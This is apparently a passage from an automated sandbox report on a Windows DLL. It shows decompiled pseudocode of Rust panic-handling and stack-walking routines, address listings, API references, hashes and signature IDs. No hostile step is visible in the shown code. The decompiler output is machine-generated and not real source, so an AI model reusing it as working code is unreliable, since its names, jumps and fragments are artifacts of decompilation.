					} else {
						_t262 =  *(_t310 + 0x10) +  *(_t310 + 0x10);
						 *(_t310 + 0x10) = _t262;
						if(_t262 >= 0x201) {
							goto L4;
						} else {
							goto L7;
						}
						goto L8;
					}
				} else {
					_t260 = GetLastError();
					_t264 = 1;
					 *(_t310 + 0x44) = _t260;
					 *(_t310 + 0x40) = 0;
					_t200 =  *(_t310 + 0x30);
					__eflags = _t200;
					if(_t200 != 0) {
						L18:
						__eflags =  *(_t310 + 0x14);
						if( *(_t310 + 0x14) != 0) {
							__eflags = _t200 & 0x7fffffff;
							if((_t200 & 0x7fffffff) != 0) {
								HeapFree( *0x6e4fadc8, 0,  *(_t310 + 0x14));
							}
						}
					}
					L21:
					__eflags = _t264;
					if(_t264 == 0) {
						_t201 =  *(_t310 + 0x40);
						_t274 =  *(_t310 + 0x44);
						_t293 =  *(_t310 + 0x48);
						_t265 =  *(_t310 + 0x28);
						 *(_t310 + 0x5a8) = 2;
					} else {
						__eflags =  *(_t310 + 0x40) - 3;
						if( *(_t310 + 0x40) == 3) {
							_t288 =  *(_t310 + 0x44);
							 *(_t310 + 0x10) = _t288;
							 *(_t310 + 0x5a8) = 1;
							 *((intOrPtr*)( *((intOrPtr*)(_t288 + 4))))( *_t288);
							_t318 = _t318 + 4;
							_t250 =  *(_t310 + 0x10);
							_t274 =  *(_t250 + 4);
							__eflags =  *(_t274 + 4);
							if( *(_t274 + 4) != 0) {
								_t252 =  *_t250;
								__eflags =  *((intOrPtr*)(_t274 + 8)) - 9;
								if( *((intOrPtr*)(_t274 + 8)) >= 9) {
									_t252 =  *(_t252 - 4);
								}
								HeapFree( *0x6e4fadc8, 0, _t252);
								_t250 =  *(_t310 + 0x44);
							}
							HeapFree( *0x6e4fadc8, 0, _t250);
						}
						_t265 =  *(_t310 + 0xe);
						_t201 = 0;
						 *(_t310 + 0x5a8) = 2;
					}
					 *((char*)(_t310 + 0x68)) = _t265;
					 *(_t310 + 0x5c) = _t201;
					 *(_t310 + 0x64) = _t293;
					 *(_t310 + 0x60) = _t274;
					 *(_t310 + 0x190) = 0x6e4ed5c8;
					 *(_t310 + 0x194) = 1;
					 *(_t310 + 0x198) = 0;
					 *((intOrPtr*)(_t310 + 0x1a0)) = 0x6e4ecd60;
					 *(_t310 + 0x1a4) = 0;
					_t294 =  *(_a8 + 0x1c);
					_push(_t310 + 0x190);
					_t204 = E6E4A2320( *((intOrPtr*)(_a8 + 0x18)), _t294);
					_t322 = _t318 + 4;
					__eflags = _t204;
					if(_t204 != 0) {
						L50:
						_t205 =  *(_t310 + 0x5c);
						__eflags = _t205;
						if(_t205 != 0) {
							__eflags =  *(_t310 + 0x60);
							if( *(_t310 + 0x60) != 0) {
								HeapFree( *0x6e4fadc8, 0, _t205);
							}
						}
						_t206 = 1;
						goto L54;
					} else {
						_t208 =  *(_t310 + 0xe);
						 *(_t310 + 0x6c) = 0;
						 *((char*)(_t310 + 0xf)) = 0;
						 *(_t310 + 0x40) = _a8;
						 *(_t310 + 0x44) = 0;
						__eflags = _t208;
						 *((char*)(_t310 + 0x50)) = _t208;
						 *(_t310 + 0x2c) = _t310 + 0xe;
						 *(_t310 + 0x48) = _t310 + 0x5c;
						 *((intOrPtr*)(_t310 + 0x4c)) = 0x6e4ed5d0;
						 *(_t310 + 0x1b) = _t208 != 0;
						 *(_t310 + 0x30) = _t310 + 0x6c;
						 *(_t310 + 0x34) = _t310 + 0x1b;
						 *((intOrPtr*)(_t310 + 0x38)) = _t310 + 0xf;
						 *((intOrPtr*)(_t310 + 0x3c)) = _t310 + 0x40;
						 *(_t310 + 0x10) = GetCurrentProcess();
						 *(_t310 + 0x24) = GetCurrentThread();
						_t307 = _t310 + 0x190;
						E6E4BC310(_t307, _t307, 0, 0x2d0);
						_t324 = _t322 + 0xc;
						_push(_t307);
						L6E4B9EEE();
						_t217 = E6E4AE690(_t265, _t307, _t310);
						__eflags = _t217;
						if(_t217 == 0) {
							_t308 =  *0x6e4fade8; // 0x0
							 *(_t310 + 0x58) = _t294;
							__eflags = _t308;
							if(_t308 == 0) {
								_t218 = GetProcAddress( *0x6e4fadd0, "SymFunctionTableAccess64");
								__eflags = _t218;
								if(__eflags == 0) {
									 *(_t310 + 0x5a8) = 3;
									E6E4C6E20(_t265, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6e4ee2c0);
									goto L70;
								} else {
									_t308 = _t218;
									 *0x6e4fade8 = _t218;
									_t267 =  *0x6e4fadec; // 0x0
									__eflags = _t267;
									if(_t267 != 0) {
										goto L41;
									} else {
										goto L39;
									}
								}
							} else {
								_t267 =  *0x6e4fadec; // 0x0
								__eflags = _t267;
								if(_t267 != 0) {
									L41:
									 *(_t310 + 0x20) = GetCurrentProcess();
									_t221 =  *0x6e4fadf8; // 0x0
									 *(_t310 + 0x1c) = _t308;
									 *(_t310 + 0x14) = _t267;
									__eflags = _t221;
									if(_t221 != 0) {
										L44:
										 *(_t310 + 0x28) = _t221;
										 *(_t310 + 0x74) = 0;
										 *(_t310 + 0x70) = 0;
										E6E4BC310(_t308, _t310 + 0x80, 0, 0x10c);
										_t324 = _t324 + 0xc;
										 *(_t310 + 0x7c) = 0;
										 *(_t310 + 0x78) =  *(_t310 + 0x248);
										 *(_t310 + 0x84) = 3;
										 *((intOrPtr*)(_t310 + 0xa8)) =  *((intOrPtr*)(_t310 + 0x254));
										 *(_t310 + 0xac) = 0;
										 *(_t310 + 0xb4) = 3;
										 *((intOrPtr*)(_t310 + 0x98)) =  *((intOrPtr*)(_t310 + 0x244));
										 *(_t310 + 0x9c) = 0;
										 *(_t310 + 0xa4) = 3;
										while(1) {
											_t227 =  *(_t310 + 0x28)(0x14c,  *(_t310 + 0x10),  *(_t310 + 0x24), _t310 + 0x78, _t310 + 0x190, 0, _t308, _t267, 0, 0);
											__eflags = _t227 - 1;
											if(_t227 != 1) {
												goto L47;
											}
											 *(_t310 + 0x188) =  *_t267( *(_t310 + 0x20),  *(_t310 + 0x78), 0);
											 *(_t310 + 0x5a8) = 3;
											_t235 = E6E4AE890(_t267, _t310 + 0x2c, _t310 + 0x70, _t308, _t310);
											_t308 =  *(_t310 + 0x1c);
											_t267 =  *(_t310 + 0x14);
											__eflags = _t235;
											if(_t235 != 0) {
												continue;
											}
											goto L47;
										}
										goto L47;
									} else {
										_t221 = GetProcAddress( *0x6e4fadd0, "StackWalkEx");
										__eflags = _t221;
										if(_t221 == 0) {
											E6E4BC310(_t308, _t310 + 0x80, 0, 0x100);
											_t324 = _t324 + 0xc;
											 *(_t310 + 0x74) = 0;
											 *(_t310 + 0x70) = 1;
											 *(_t310 + 0x188) = 0;
											 *(_t310 + 0x7c) = 0;
											 *(_t310 + 0x78) =  *(_t310 + 0x248);
											 *(_t310 + 0x84) = 3;
											 *((intOrPtr*)(_t310 + 0xa8)) =  *((intOrPtr*)(_t310 + 0x254));
											 *(_t310 + 0xac) = 0;
											 *(_t310 + 0xb4) = 3;
											 *((intOrPtr*)(_t310 + 0x98)) =  *((intOrPtr*)(_t310 + 0x244));
											 *(_t310 + 0x9c) = 0;
											 *(_t310 + 0xa4) = 3;
											do {
												_t284 =  *0x6e4fade4; // 0x0
												__eflags = _t284;
												if(_t284 != 0) {
													L63:
													_t241 =  *_t284(0x14c,  *(_t310 + 0x10),  *(_t310 + 0x24), _t310 + 0x78, _t310 + 0x190, 0, _t308, _t267, 0);
													__eflags = _t241 - 1;
													if(_t241 != 1) {
														L47:
														ReleaseMutex( *(_t310 + 0x58));
														__eflags =  *((char*)(_t310 + 0xf));
														if( *((char*)(_t310 + 0xf)) != 0) {
															goto L50;
														} else {
															goto L48;
														}
														goto L54;
													} else {
														goto L64;
													}
												} else {
													_t244 = GetProcAddress( *0x6e4fadd0, "StackWalk64");
													__eflags = _t244;
													if(__eflags == 0) {
														 *(_t310 + 0x5a8) = 3;
														E6E4C6E20(_t267, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6e4ee2c0);
														goto L70;
													} else {
														_t284 = _t244;
														 *0x6e4fade4 = _t244;
														goto L63;
													}
												}
												goto L71;
												L64:
												 *(_t310 + 0x188) =  *_t267( *(_t310 + 0x20),  *(_t310 + 0x78), 0);
												 *(_t310 + 0x5a8) = 3;
												_t243 = E6E4AE890(_t267, _t310 + 0x2c, _t310 + 0x70, _t308, _t310);
												_t308 =  *(_t310 + 0x1c);
												_t267 =  *(_t310 + 0x14);
												__eflags = _t243;
											} while (_t243 != 0);
											goto L47;
										} else {
											 *0x6e4fadf8 = _t221;
											goto L44;
										}
									}
								} else {
									L39:
									_t246 = GetProcAddress( *0x6e4fadd0, "SymGetModuleBase64");
									__eflags = _t246;
									if(__eflags == 0) {
										 *(_t310 + 0x5a8) = 3;
										E6E4C6E20(_t267, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6e4ee2c0);
										L70:
										asm("ud2");
										_push(_t313);
										return E6E4AE880( *((intOrPtr*)( &_v1456 + 0x58)));
									} else {
										_t267 = _t246;
										 *0x6e4fadec = _t246;
										goto L41;
									}
								}
							}
						} else {
							__eflags =  *((char*)(_t310 + 0xf));
							if( *((char*)(_t310 + 0xf)) != 0) {
								goto L50;
							} else {
								L48:
								__eflags =  *(_t310 + 0xe);
								if( *(_t310 + 0xe) != 0) {
									L55:
									_t229 =  *(_t310 + 0x5c);
									__eflags = _t229;
									if(_t229 != 0) {
										__eflags =  *(_t310 + 0x60);
										if( *(_t310 + 0x60) != 0) {
											HeapFree( *0x6e4fadc8, 0, _t229);
										}
									}
									_t206 = 0;
								} else {
									 *(_t310 + 0x190) = 0x6e4ed63c;
									 *(_t310 + 0x194) = 1;
									 *(_t310 + 0x198) = 0;
									 *((intOrPtr*)(_t310 + 0x1a0)) = 0x6e4ecd60;
									 *(_t310 + 0x1a4) = 0;
									 *(_t310 + 0x5a8) = 2;
									_push(_t310 + 0x190);
									_t233 = E6E4A2320( *((intOrPtr*)(_a8 + 0x18)),  *(_a8 + 0x1c));
									__eflags = _t233;
									if(_t233 == 0) {
										goto L55;
									} else {
										goto L50;
									}
								}
							}
							L54:
							 *[fs:0x0] =  *((intOrPtr*)(_t310 + 0x5a0));
							return _t206;
						}
					}
				}
				L71:
			}



















































                          0x6e4adee3
                          0x6e4adee4
                          0x6e4adee5
                          0x6e4adee9
                          0x6e4adeef
                          0x6e4adef1
                          0x6e4adef7
                          0x6e4adefd
                          0x6e4adf07
                          0x6e4adf21
                          0x6e4adf27
                          0x6e4adf2e
                          0x6e4adf30
                          0x6e4adf33
                          0x6e4adf44
                          0x6e4adf49
                          0x6e4adf4c
                          0x6e4adf51
                          0x6e4adf56
                          0x6e4adf5d
                          0x6e4adf60
                          0x6e4adf67
                          0x6e4adf6a
                          0x6e4adf77
                          0x6e4adf7a
                          0x6e4adf96
                          0x6e4adf96
                          0x6e4adf9c
                          0x6e4adfa0
                          0x6e4adfa2
                          0x6e4adfa4
                          0x6e4adfae
                          0x6e4adfb2
                          0x6e4adfb7
                          0x6e4adfbd
                          0x6e4adfbd
                          0x6e4adfc0
                          0x6e4adfc3
                          0x6e4adfc6
                          0x6e4adfc9
                          0x6e4adfcc
                          0x6e4adfcf
                          0x6e4adf7c
                          0x6e4adfe0
                          0x6e4adfe0
                          0x6e4adfe6
                          0x6e4adfed
                          0x6e4adfed
                          0x6e4adff0
                          0x6e4adff2
                          0x6e4adffa
                          0x6e4ae000
                          0x6e4ae004
                          0x6e4ae012
                          0x6e4adf80
                          0x6e4adf83
                          0x6e4adf85
                          0x6e4ae03d
                          0x6e4ae040
                          0x6e4ae04a
                          0x6e4ae04c
                          0x6e4ae568
                          0x00000000
                          0x6e4ae052
                          0x6e4ae052
                          0x6e4ae055
                          0x6e4ae058
                          0x6e4ae059
                          0x6e4ae05e
                          0x6e4ae064
                          0x6e4ae069
                          0x6e4ae06b
                          0x6e4ae06e
                          0x6e4ae073
                          0x6e4ae076
                          0x6e4ae078
                          0x00000000
                          0x00000000
                          0x6e4ae07a
                          0x00000000
                          0x6e4ae078
                          0x6e4adf8b
                          0x6e4adf8b
                          0x6e4adf91
                          0x6e4adf94
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4adf94
                          0x6e4ae027
                          0x6e4ae02a
                          0x6e4ae032
                          0x6e4ae035
                          0x00000000
                          0x6e4ae03b
                          0x00000000
                          0x6e4ae03b
                          0x00000000
                          0x6e4ae035
                          0x6e4ae07c
                          0x6e4ae07c
                          0x6e4ae082
                          0x6e4ae084
                          0x6e4ae087
                          0x6e4ae08e
                          0x6e4ae091
                          0x6e4ae093
                          0x6e4ae095
                          0x6e4ae095
                          0x6e4ae099
                          0x6e4ae09b
                          0x6e4ae0a0
                          0x6e4ae0ad
                          0x6e4ae0ad
                          0x6e4ae0a0
                          0x6e4ae099
                          0x6e4ae0b2
                          0x6e4ae0b2
                          0x6e4ae0b4
                          0x6e4ae11e
                          0x6e4ae121
                          0x6e4ae124
                          0x6e4ae127
                          0x6e4ae12a
                          0x6e4ae0b6
                          0x6e4ae0b6
                          0x6e4ae0ba
                          0x6e4ae0bc
                          0x6e4ae0c1
                          0x6e4ae0c7
                          0x6e4ae0d2
                          0x6e4ae0d4
                          0x6e4ae0d7
                          0x6e4ae0da
                          0x6e4ae0dd
                          0x6e4ae0e1
                          0x6e4ae0e3
                          0x6e4ae0e5
                          0x6e4ae0e9
                          0x6e4ae0eb
                          0x6e4ae0eb
                          0x6e4ae0f7
                          0x6e4ae0fc
                          0x6e4ae0fc
                          0x6e4ae108
                          0x6e4ae108
                          0x6e4ae10d
                          0x6e4ae110
                          0x6e4ae112
                          0x6e4ae112
                          0x6e4ae134
                          0x6e4ae137
                          0x6e4ae13d
                          0x6e4ae140
                          0x6e4ae143
                          0x6e4ae14d
                          0x6e4ae157
                          0x6e4ae161
                          0x6e4ae16b
                          0x6e4ae178
                          0x6e4ae181
                          0x6e4ae182
                          0x6e4ae187
                          0x6e4ae18a
                          0x6e4ae18c
                          0x6e4ae405
                          0x6e4ae405
                          0x6e4ae408
                          0x6e4ae40a
                          0x6e4ae40c
                          0x6e4ae410
                          0x6e4ae41b
                          0x6e4ae41b
                          0x6e4ae410
                          0x6e4ae420
                          0x00000000
                          0x6e4ae192
                          0x6e4ae192
                          0x6e4ae198
                          0x6e4ae19f
                          0x6e4ae1a3
                          0x6e4ae1a6
                          0x6e4ae1ad
                          0x6e4ae1af
                          0x6e4ae1b8
                          0x6e4ae1be
                          0x6e4ae1c1
                          0x6e4ae1c8
                          0x6e4ae1cc
                          0x6e4ae1d2
                          0x6e4ae1d8
                          0x6e4ae1de
                          0x6e4ae1e6
                          0x6e4ae1ef
                          0x6e4ae1f9
                          0x6e4ae200
                          0x6e4ae205
                          0x6e4ae208
                          0x6e4ae209
                          0x6e4ae20e
                          0x6e4ae213
                          0x6e4ae215
                          0x6e4ae226
                          0x6e4ae22c
                          0x6e4ae22f
                          0x6e4ae231
                          0x6e4ae24a
                          0x6e4ae250
                          0x6e4ae252
                          0x6e4ae595
                          0x6e4ae5ae
                          0x00000000
                          0x6e4ae258
                          0x6e4ae258
                          0x6e4ae25a
                          0x6e4ae25f
                          0x6e4ae265
                          0x6e4ae267
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4ae267
                          0x6e4ae233
                          0x6e4ae233
                          0x6e4ae239
                          0x6e4ae23b
                          0x6e4ae289
                          0x6e4ae28e
                          0x6e4ae291
                          0x6e4ae296
                          0x6e4ae299
                          0x6e4ae29c
                          0x6e4ae29e
                          0x6e4ae2be
                          0x6e4ae2be
                          0x6e4ae2c7
                          0x6e4ae2ce
                          0x6e4ae2dd
                          0x6e4ae2e2
                          0x6e4ae2f7
                          0x6e4ae2fe
                          0x6e4ae301
                          0x6e4ae30b
                          0x6e4ae311
                          0x6e4ae31b
                          0x6e4ae325
                          0x6e4ae32b
                          0x6e4ae335
                          0x6e4ae340
                          0x6e4ae35e
                          0x6e4ae361
                          0x6e4ae364
                          0x00000000
                          0x00000000
                          0x6e4ae376
                          0x6e4ae37c
                          0x6e4ae386
                          0x6e4ae38b
                          0x6e4ae38e
                          0x6e4ae391
                          0x6e4ae393
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4ae393
                          0x00000000
                          0x6e4ae2a0
                          0x6e4ae2ab
                          0x6e4ae2b1
                          0x6e4ae2b3
                          0x6e4ae464
                          0x6e4ae469
                          0x6e4ae47e
                          0x6e4ae485
                          0x6e4ae48c
                          0x6e4ae496
                          0x6e4ae49d
                          0x6e4ae4a0
                          0x6e4ae4aa
                          0x6e4ae4b0
                          0x6e4ae4ba
                          0x6e4ae4c4
                          0x6e4ae4ca
                          0x6e4ae4d4
                          0x6e4ae4e0
                          0x6e4ae4e0
                          0x6e4ae4e6
                          0x6e4ae4e8
                          0x6e4ae506
                          0x6e4ae522
                          0x6e4ae524
                          0x6e4ae527
                          0x6e4ae395
                          0x6e4ae398
                          0x6e4ae39d
                          0x6e4ae3a1
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4ae4ea
                          0x6e4ae4f5
                          0x6e4ae4fb
                          0x6e4ae4fd
                          0x6e4ae572
                          0x6e4ae58b
                          0x00000000
                          0x6e4ae4ff
                          0x6e4ae4ff
                          0x6e4ae501
                          0x00000000
                          0x6e4ae501
                          0x6e4ae4fd
                          0x00000000
                          0x6e4ae52d
                          0x6e4ae53d
                          0x6e4ae543
                          0x6e4ae54d
                          0x6e4ae552
                          0x6e4ae555
                          0x6e4ae558
                          0x6e4ae558
                          0x00000000
                          0x6e4ae2b9
                          0x6e4ae2b9
                          0x00000000
                          0x6e4ae2b9
                          0x6e4ae2b3
                          0x6e4ae23d
                          0x6e4ae269
                          0x6e4ae274
                          0x6e4ae27a
                          0x6e4ae27c
                          0x6e4ae5b8
                          0x6e4ae5d1
                          0x6e4ae5d9
                          0x6e4ae5d9
                          0x6e4ae5e0
                          0x6e4ae5fc
                          0x6e4ae282
                          0x6e4ae282
                          0x6e4ae284
                          0x00000000
                          0x6e4ae284
                          0x6e4ae27c
                          0x6e4ae23b
                          0x6e4ae217
                          0x6e4ae217
                          0x6e4ae21b
                          0x00000000
                          0x6e4ae221
                          0x6e4ae3a3
                          0x6e4ae3a3
                          0x6e4ae3a7
                          0x6e4ae437
                          0x6e4ae437
                          0x6e4ae43a
                          0x6e4ae43c
                          0x6e4ae43e
                          0x6e4ae442
                          0x6e4ae44d
                          0x6e4ae44d
                          0x6e4ae442
                          0x6e4ae452
                          0x6e4ae3ad
                          0x6e4ae3b0
                          0x6e4ae3ba
                          0x6e4ae3c4
                          0x6e4ae3ce
                          0x6e4ae3d8
                          0x6e4ae3e2
                          0x6e4ae3f8
                          0x6e4ae3f9
                          0x6e4ae401
                          0x6e4ae403
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x6e4ae403
                          0x6e4ae3a7
                          0x6e4ae422
                          0x6e4ae428
                          0x6e4ae436
                          0x6e4ae436
                          0x6e4ae215
                          0x6e4ae18c
                          0x00000000

                          APIs
                          • SetLastError.KERNEL32(00000000), ref: 6E4ADFF2
                          • GetCurrentDirectoryW.KERNEL32(?,?), ref: 6E4ADFFA
                          • GetLastError.KERNEL32 ref: 6E4AE006
                          • GetLastError.KERNEL32 ref: 6E4AE018
                          • GetLastError.KERNEL32 ref: 6E4AE07C
                          • HeapFree.KERNEL32(00000000,00000000), ref: 6E4AE0AD
                          • HeapFree.KERNEL32(00000000,?), ref: 6E4AE0F7
                          • HeapFree.KERNEL32(00000000,?), ref: 6E4AE108
                          • GetCurrentProcess.KERNEL32(?), ref: 6E4AE1E1
                          • GetCurrentThread.KERNEL32 ref: 6E4AE1E9
                          • RtlCaptureContext.KERNEL32(?), ref: 6E4AE209
                          • GetProcAddress.KERNEL32(SymFunctionTableAccess64,?), ref: 6E4AE24A
                          • GetProcAddress.KERNEL32(SymGetModuleBase64), ref: 6E4AE274
                          • GetCurrentProcess.KERNEL32 ref: 6E4AE289
                          • GetProcAddress.KERNEL32(StackWalkEx), ref: 6E4AE2AB
                          • ReleaseMutex.KERNEL32(?), ref: 6E4AE398
                          • HeapFree.KERNEL32(00000000,?), ref: 6E4AE41B
                          • HeapFree.KERNEL32(00000000,?,?), ref: 6E4AE44D
                          • GetProcAddress.KERNEL32(StackWalk64), ref: 6E4AE4F5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.993730113.000000006E4A1000.00000020.00020000.sdmp, Offset: 6E4A0000, based on PE: true
                          • Associated: 00000000.00000002.993716574.000000006E4A0000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993761074.000000006E4C8000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993781165.000000006E4FA000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993797257.000000006E4FC000.00000008.00020000.sdmp Download File
                          • Associated: 00000000.00000002.993806530.000000006E4FD000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: FreeHeap$AddressCurrentErrorLastProc$Process$CaptureContextDirectoryMutexReleaseThread
                          • String ID: StackWalk64$StackWalkEx$SymFunctionTableAccess64$SymGetModuleBase64$called `Option::unwrap()` on a `None` value
                          • API String ID: 1381040140-1036201984
                          • Opcode ID: 8f6f8daf1b09bf59cba4eb71d66dc03a4f4173e05f02fb0016601b8c9748a43a
                          • Instruction ID: a56b7e44f3f14a25e88bce43fee0902935f0cd9e33a92b9be8803eecdbc2044e
                          • Opcode Fuzzy Hash: 8f6f8daf1b09bf59cba4eb71d66dc03a4f4173e05f02fb0016601b8c9748a43a
                          • Instruction Fuzzy Hash: 3D1245B0600B009FE760CFB9D884B93BBE5BF59718F00491ED6AA8BA84D771B445CB51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 6E4AC8C0, Relevance: 33.7, APIs: 14, Strings: 5, Instructions: 477memoryCOMMON
                          Download Yara Rule
                          C-Code - Quality: 69%
                          			E6E4AC8C0(long _a4, signed int _a8) {
				void* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				void* _v36;
				void* _v40;
				char _v41;
				long _v48;
				long* _v52;
				intOrPtr _v56;
				long _v60;
				void _v64;
				long* _v68;
				long _v72;
				char _v76;
				long* _v80;
				void* _v84;
				char _v88;
				long _v92;
				char* _v96;
				long _v100;
				void* _v104;
				void** _v108;
				void* _v112;
				long _v116;
				void* _v120;
				long _v124;
				char _v128;
				intOrPtr _v132;
				void _v136;
				void* _v140;
				intOrPtr _v144;
				signed int _v148;
				intOrPtr _v152;
				intOrPtr* _t190;
				void* _t194;
				void _t195;
				intOrPtr* _t196;
				signed int _t197;
				signed int _t199;
				char* _t201;
				long _t202;
				long _t203;
				void* _t204;
				void* _t205;
				long _t206;
				void _t209;
				void _t210;
				void* _t219;
				void* _t222;
				long _t226;
				void* _t235;
				void* _t245;
				void* _t247;
				void* _t248;
				char** _t251;
				char** _t252;
				void* _t256;
				void* _t260;
				void _t264;
				char _t265;
				signed char _t267;
				void _t270;
				intOrPtr _t273;
				void* _t275;
				char* _t276;
				void _t277;
				void* _t280;
				intOrPtr _t291;
				intOrPtr _t295;
				void _t298;
				long _t302;
				void* _t307;
				void* _t308;
				void* _t309;
				signed int _t310;
				signed int _t312;
				void* _t318;
				intOrPtr* _t324;
				long _t326;
				void* _t327;
				void* _t330;
				void* _t331;
				void* _t332;
				void* _t333;
				void* _t334;
				void* _t335;
				intOrPtr _t336;
				void* _t347;
				void* _t360;
				long _t361;

				_v32 = _t336;
				_v20 = 0xffffffff;
				_v24 = E6E4B3B50;
				_t264 = _t270;
				_t332 = 1;
				_t330 = _t307;
				_v28 =  *[fs:0x0];
				 *[fs:0x0] =  &_v28;
				asm("lock xadd [0x6e4fadc0], esi");
				_t190 = E6E4AD1B0(_t264, _t330);
				_t337 = _t190;
				if(_t190 == 0) {
					_t190 = E6E4C6EE0(_t264,  &M6E4ED0E7, 0x46, _t337,  &_v68, 0x6e4ed060, 0x6e4ed1ac);
					_t336 = _t336 + 0xc;
					asm("ud2");
				}
				_t308 = _a8;
				_t273 =  *_t190 + 1;
				 *_t190 = _t273;
				if(_t332 < 0 || _t273 >= 3) {
					__eflags = _t273 - 2;
					if(__eflags <= 0) {
						_v124 = 0x6e4ecd60;
						_v120 = 0x6e4ed014;
						_v68 = 0x6e4eda50;
						_v64 = 2;
						_v96 = 0;
						_v100 = 0;
						_v60 = 0;
						_v116 = _a4;
						_v112 = _t308;
						_t309 =  &_v68;
						_v80 =  &_v124;
						_v76 = E6E4A2640;
						_v52 =  &_v80;
						_v48 = 1;
						_t194 = E6E4AD2A0( &_v100, __eflags);
						__eflags = _t194 - 3;
						if(_t194 == 3) {
							_v20 = 0;
							_v36 = _t309;
							 *((intOrPtr*)( *((intOrPtr*)(_t309 + 4))))( *_t309);
							_t336 = _t336 + 4;
							L11:
							_t332 = _v36;
							_t302 =  *(_t332 + 4);
							__eflags =  *(4 + _t302);
							if( *(4 + _t302) != 0) {
								_t256 =  *_t332;
								__eflags =  *((intOrPtr*)(_t302 + 8)) - 9;
								if( *((intOrPtr*)(_t302 + 8)) >= 9) {
									_t256 =  *(_t256 - 4);
								}
								HeapFree( *0x6e4fadc8, 0, _t256);
							}
							_t194 = HeapFree( *0x6e4fadc8, 0, _t332);
						}
						goto L16;
					}
					_t327 =  &_v68;
					_v68 = 0x6e4eda14;
					_v64 = 1;
					_v60 = 0;
					_v52 = 0x6e4ecd60;
					_v120 = 0;
					_v124 = 0;
					_v48 = 0;
					_t194 = E6E4AD2A0( &_v124, __eflags);
					__eflags = _t194 - 3;
					if(_t194 != 3) {
						goto L16;
					} else {
						_v20 = 1;
						_v36 = _t327;
						 *((intOrPtr*)( *((intOrPtr*)(_t327 + 4))))( *_t327);
						_t336 = _t336 + 4;
						goto L11;
					}
				} else {
					_v132 = _t273;
					__imp__AcquireSRWLockShared(0x6e4fadbc);
					_v144 = 0x6e4fadbc;
					_v20 = 2;
					_v136 = _t264;
					_v140 = _t330;
					_t260 =  *((intOrPtr*)(_t330 + 0x10))(_t264);
					_t336 = _t336 + 4;
					_v36 = _t260;
					_v40 = _t308;
					_t194 = E6E4AD1B0(_t264, _t330);
					_t330 = _v40;
					_t340 = _t194;
					if(_t194 != 0) {
						L17:
						__eflags =  *_t194 - 1;
						_t275 = 1;
						if( *_t194 <= 1) {
							_t195 =  *0x6e4fadb0; // 0x0
							_t310 = _a8;
							__eflags = _t195 - 2;
							if(_t195 == 2) {
								_t275 = 0;
								goto L19;
							}
							__eflags = _t195 - 1;
							if(_t195 == 1) {
								_t275 = 4;
								goto L19;
							}
							__eflags = _t195;
							if(_t195 != 0) {
								goto L19;
							}
							E6E4AD530(_t264,  &_v68, _t330, _t332);
							_t330 = _v40;
							_t248 = _v68;
							__eflags = _t248;
							if(_t248 != 0) {
								goto L68;
							}
							_t267 = 5;
							goto L86;
						}
						_t310 = _a8;
						goto L19;
					} else {
						E6E4C6EE0(_t264,  &M6E4ED0E7, 0x46, _t340,  &_v68, 0x6e4ed060, 0x6e4ed1ac);
						_t336 = _t336 + 0xc;
						L61:
						asm("ud2");
						L62:
						_t276 = "Box<dyn Any><unnamed>thread \'\' panicked at \'\', ";
						_t201 = 0xc;
						L21:
						_v100 = _t276;
						_v96 = _t201;
						_t202 =  *0x6e4fa044; // 0x0
						if(_t202 == 0) {
							_t280 = 0x6e4fa044;
							_t202 = E6E4B2B10(_t264, 0x6e4fa044, _t330, _t332);
						}
						_t194 = TlsGetValue(_t202);
						if(_t194 <= 1) {
							L42:
							_t203 =  *0x6e4fa044; // 0x0
							__eflags = _t203;
							if(_t203 == 0) {
								_t280 = 0x6e4fa044;
								_t203 = E6E4B2B10(_t264, 0x6e4fa044, _t330, _t332);
							}
							_t194 = TlsGetValue(_t203);
							__eflags = _t194;
							if(_t194 == 0) {
								_t204 =  *0x6e4fadc8; // 0x5b0000
								__eflags = _t204;
								if(_t204 != 0) {
									L66:
									_t205 = HeapAlloc(_t204, 0, 0x10);
									__eflags = _t205;
									if(__eflags != 0) {
										 *_t205 = 0;
										 *(_t205 + 0xc) = 0x6e4fa044;
										_t332 = _t205;
										_t206 =  *0x6e4fa044; // 0x0
										__eflags = _t206;
										if(_t206 == 0) {
											_v36 = _t332;
											_t206 = E6E4B2B10(_t264, 0x6e4fa044, _t330, _t332);
											_t332 = _v36;
										}
										_t194 = TlsSetValue(_t206, _t332);
										goto L75;
									}
									L67:
									_t248 = E6E4C6C30(_t264, 0x10, 4, _t330, _t332, __eflags);
									asm("ud2");
									L68:
									_t326 = _v60;
									_t298 = _v64;
									__eflags = _t326 - 4;
									if(_t326 == 4) {
										__eflags =  *_t248 - 0x6c6c7566;
										if( *_t248 != 0x6c6c7566) {
											L83:
											_t332 = 2;
											_t267 = 0;
											__eflags = 0;
											L84:
											__eflags = _t298;
											if(_t298 != 0) {
												HeapFree( *0x6e4fadc8, 0, _t248);
											}
											L86:
											__eflags = _t267 - 5;
											_t310 = _a8;
											_t269 =  !=  ? _t332 : 1;
											_t275 =  !=  ? _t267 & 0x000000ff : 4;
											_t142 =  !=  ? _t332 : 1;
											_t264 =  *0x6e4fadb0;
											 *0x6e4fadb0 =  !=  ? _t332 : 1;
											L19:
											_v148 = _t310;
											_v128 = _t275;
											_t59 = _t330 + 0xc; // 0x6e4b3440
											_t196 =  *_t59;
											_v40 = _t196;
											_t197 =  *_t196(_v36);
											_t336 = _t336 + 4;
											_t312 = _t310 ^ 0x7ef2a91e | _t197 ^ 0xecc7bcf4;
											__eflags = _t312;
											if(__eflags != 0) {
